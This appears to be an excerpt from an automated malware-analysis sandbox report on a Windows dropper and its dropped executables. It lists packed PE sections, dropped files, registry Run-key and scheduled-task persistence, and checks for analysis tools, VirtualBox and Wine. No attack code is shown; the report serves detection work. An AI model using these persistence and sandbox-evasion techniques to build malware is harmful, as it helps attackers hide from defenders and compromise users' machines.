Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Unpacked PE file: 28.2.976d9f40c1.exe.ff0000.0.unpack :EW;.rsrc :W;.idata :W;hinhbduz:EW;spippvyb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;hinhbduz:EW;spippvyb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Unpacked PE file: 31.2.606f2f6db0.exe.e0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;njaoxwad:EW;wxwvdadu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;njaoxwad:EW;wxwvdadu:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: num.exe.8.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: real checksum: 0x1cc9f0 should be: 0x1cbb3a
Source: random[1].exe.8.dr Static PE information: real checksum: 0x2e7796 should be: 0x2e03f1
Source: 976d9f40c1.exe.8.dr Static PE information: real checksum: 0x2e7796 should be: 0x2e03f1
Source: 606f2f6db0.exe.8.dr Static PE information: real checksum: 0x1cc9f0 should be: 0x1cbb3a
Source: QDDSFWH7TPMYGYIMIOWX7SBOU5.exe.0.dr Static PE information: real checksum: 0x2bc9c7 should be: 0x2bd233
Source: random[1].exe0.8.dr Static PE information: real checksum: 0x1cc9f0 should be: 0x1cbb3a
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: real checksum: 0x1e03ba should be: 0x1e2b8e
Source: file.exe Static PE information: real checksum: 0x2e7796 should be: 0x2e03f1
Source: skotes.exe.3.dr Static PE information: real checksum: 0x1e03ba should be: 0x1e2b8e
Source: num[1].exe.8.dr Static PE information: real checksum: 0x0 should be: 0x52a2a
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: hinhbduz
Source: file.exe Static PE information: section name: spippvyb
Source: file.exe Static PE information: section name: .taggant
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: section name:
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: section name: .idata
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: section name:
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: section name: ptpgbbgo
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: section name: epijyeip
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: section name: .taggant
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: section name:
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: section name: .rsrc
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: section name: .idata
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: section name:
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: section name: njaoxwad
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: section name: wxwvdadu
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: section name: .taggant
Source: QDDSFWH7TPMYGYIMIOWX7SBOU5.exe.0.dr Static PE information: section name:
Source: QDDSFWH7TPMYGYIMIOWX7SBOU5.exe.0.dr Static PE information: section name: .idata
Source: QDDSFWH7TPMYGYIMIOWX7SBOU5.exe.0.dr Static PE information: section name: ohppgexj
Source: QDDSFWH7TPMYGYIMIOWX7SBOU5.exe.0.dr Static PE information: section name: lrldjnhc
Source: QDDSFWH7TPMYGYIMIOWX7SBOU5.exe.0.dr Static PE information: section name: .taggant
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: .idata
Source: skotes.exe.3.dr Static PE information: section name:
Source: skotes.exe.3.dr Static PE information: section name: ptpgbbgo
Source: skotes.exe.3.dr Static PE information: section name: epijyeip
Source: skotes.exe.3.dr Static PE information: section name: .taggant
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name: .rsrc
Source: random[1].exe.8.dr Static PE information: section name: .idata
Source: random[1].exe.8.dr Static PE information: section name: hinhbduz
Source: random[1].exe.8.dr Static PE information: section name: spippvyb
Source: random[1].exe.8.dr Static PE information: section name: .taggant
Source: 976d9f40c1.exe.8.dr Static PE information: section name:
Source: 976d9f40c1.exe.8.dr Static PE information: section name: .rsrc
Source: 976d9f40c1.exe.8.dr Static PE information: section name: .idata
Source: 976d9f40c1.exe.8.dr Static PE information: section name: hinhbduz
Source: 976d9f40c1.exe.8.dr Static PE information: section name: spippvyb
Source: 976d9f40c1.exe.8.dr Static PE information: section name: .taggant
Source: random[1].exe0.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name: .rsrc
Source: random[1].exe0.8.dr Static PE information: section name: .idata
Source: random[1].exe0.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name: njaoxwad
Source: random[1].exe0.8.dr Static PE information: section name: wxwvdadu
Source: random[1].exe0.8.dr Static PE information: section name: .taggant
Source: 606f2f6db0.exe.8.dr Static PE information: section name:
Source: 606f2f6db0.exe.8.dr Static PE information: section name: .rsrc
Source: 606f2f6db0.exe.8.dr Static PE information: section name: .idata
Source: 606f2f6db0.exe.8.dr Static PE information: section name:
Source: 606f2f6db0.exe.8.dr Static PE information: section name: njaoxwad
Source: 606f2f6db0.exe.8.dr Static PE information: section name: wxwvdadu
Source: 606f2f6db0.exe.8.dr Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010D6A04 push esp; ret 0_3_010D6A09
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010D6A04 push esp; ret 0_3_010D6A09
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010D6A04 push esp; ret 0_3_010D6A09
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010D6A04 push esp; ret 0_3_010D6A09
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010DB3DA push ss; iretd 0_3_010DB3DF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010DB3DA push ss; iretd 0_3_010DB3DF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010DB3DA push ss; iretd 0_3_010DB3DF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010DB3DA push ss; iretd 0_3_010DB3DF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_059947C5 push BA007734h; ret 0_3_059947CA
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_059997B0 push fs; retf 0_3_059997B2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_059997B0 push fs; retf 0_3_059997B2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010D6A04 push esp; ret 0_3_010D6A09
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010D6A04 push esp; ret 0_3_010D6A09
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010D6A04 push esp; ret 0_3_010D6A09
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010D6A04 push esp; ret 0_3_010D6A09
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010DB3DA push ss; iretd 0_3_010DB3DF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010DB3DA push ss; iretd 0_3_010DB3DF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010DB3DA push ss; iretd 0_3_010DB3DF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010DB3DA push ss; iretd 0_3_010DB3DF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010D6A04 push esp; ret 0_3_010D6A09
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010D6A04 push esp; ret 0_3_010D6A09
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010D6A04 push esp; ret 0_3_010D6A09
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010D6A04 push esp; ret 0_3_010D6A09
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010DB3DA push ss; iretd 0_3_010DB3DF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010DB3DA push ss; iretd 0_3_010DB3DF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010DB3DA push ss; iretd 0_3_010DB3DF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010DB3DA push ss; iretd 0_3_010DB3DF
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_059947C5 push BA007734h; ret 0_3_059947CA
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_059997B0 push fs; retf 0_3_059997B2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_059997B0 push fs; retf 0_3_059997B2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_010E94E5 push ss; iretd 0_3_010E94EA
Source: file.exe Static PE information: section name: entropy: 7.974874912426468
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: section name: entropy: 7.9749859248293
Source: S14AV77TIR9DRWSCWIW0.exe.0.dr Static PE information: section name: ptpgbbgo entropy: 7.954091941030984
Source: 7RNKVR1EZ552XQ73.exe.0.dr Static PE information: section name: njaoxwad entropy: 7.953810416570519
Source: QDDSFWH7TPMYGYIMIOWX7SBOU5.exe.0.dr Static PE information: section name: entropy: 7.802495720845902
Source: skotes.exe.3.dr Static PE information: section name: entropy: 7.9749859248293
Source: skotes.exe.3.dr Static PE information: section name: ptpgbbgo entropy: 7.954091941030984
Source: random[1].exe.8.dr Static PE information: section name: entropy: 7.974874912426468
Source: 976d9f40c1.exe.8.dr Static PE information: section name: entropy: 7.974874912426468
Source: random[1].exe0.8.dr Static PE information: section name: njaoxwad entropy: 7.953810416570519
Source: 606f2f6db0.exe.8.dr Static PE information: section name: njaoxwad entropy: 7.953810416570519
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2d569de7b1.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 606f2f6db0.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 976d9f40c1.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 976d9f40c1.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 976d9f40c1.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 606f2f6db0.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 606f2f6db0.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2d569de7b1.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2d569de7b1.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
